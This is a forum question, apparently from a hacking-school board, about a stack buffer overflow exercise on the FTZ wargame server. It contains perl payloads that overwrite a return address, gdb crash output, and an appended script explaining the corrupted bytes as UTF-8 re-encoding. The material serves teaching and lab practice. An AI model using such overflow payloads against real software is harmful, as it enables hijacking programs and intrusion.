Linux

   smile0909
   Hex code doesn't get inserted into the stack on the ftz server ㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392


I'm testing while logged in with the guest account on the ftz server, in order to make lecture material on a simple BOF.
All the options that can be set at compile time are set. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

I'm trying to put an address value (\x92\x83\x04\x08) into the return address part of the stack with a BOF attack, but it doesn't work..
When I took a core dump, a \xc2 value keeps getting inserted in between, like \xc2\x92\xc2\x83\xc2\x04\xc2\x08.

The size of the char array buffer is 4.
It comes out as below..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


Did you perhaps intend for garbage values to be inserted in between when hex code is put on the stack?
This is a method that definitely used to work... strange.. I think it definitely worked on the ftz server too last year or the year before, so why does it suddenly not work? ㅠㅠ

+
As shown below, it works fine on the BOF Expedition server. (I set up a separate guest account.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!


  Hit : 2691     Date : 2015/01/23 04:38
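
The byte pattern in the gdb output above can be checked against one hypothesis, shown here as an added example that is not part of the original post: the frame address 0x83c292c2 is what results when the piped bytes pass through a UTF-8 output layer that treats each byte as a code point. That such a layer is active on the ftz server is an assumption, the function names are hypothetical, and 0x08048438 is derived from the bytes typed on the second server.

```python
import struct

def frame_bytes(pc: int) -> bytes:
    """Memory layout of a 32-bit little-endian address as gdb prints it in '#0'."""
    return struct.pack("<I", pc)

def utf8_of_latin1(raw: bytes) -> bytes:
    """Output of a UTF-8 layer that treats every input byte as a code point.
    Bytes 0x80-0xFF grow to two bytes with a 0xC2 or 0xC3 lead byte."""
    return raw.decode("latin-1").encode("utf-8")

def classify(intended: bytes, observed: bytes) -> str:
    """Compare the bytes that were typed with what landed in the return slot.
    'observed' may be shorter than the re-encoded stream: only 4 bytes fit."""
    if not observed:
        return "other"
    if intended[:len(observed)] == observed:
        return "intact"
    if utf8_of_latin1(intended)[:len(observed)] == observed:
        return "utf8-reencoded"
    return "other"

def expansion(raw: bytes):
    """Per-byte view: (input byte, bytes emitted), both as hex strings."""
    return [(bytes([b]).hex(), utf8_of_latin1(bytes([b])).hex()) for b in raw]

if __name__ == "__main__":
    # Values taken from the post: typed bytes and the '#0' frame address.
    typed_ftz = b"\x92\x83\x04\x08"
    seen_ftz = frame_bytes(0x83C292C2)
    print("ftz   :", seen_ftz.hex(), "->", classify(typed_ftz, seen_ftz))
    for src, out in expansion(typed_ftz):
        print(f"  {src} -> {out}")

    # Second server from the post, where the run succeeded; the address is
    # derived from the typed bytes, not read from a debugger.
    typed_other = b"\x38\x84\x04\x08"
    seen_other = frame_bytes(0x08048438)
    print("other :", seen_other.hex(), "->", classify(typed_other, seen_other))
```

Comparing `perl -e '...' | xxd` on both servers, together with the output of `locale`, shows whether the bytes are already changed before they reach `./test`.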



    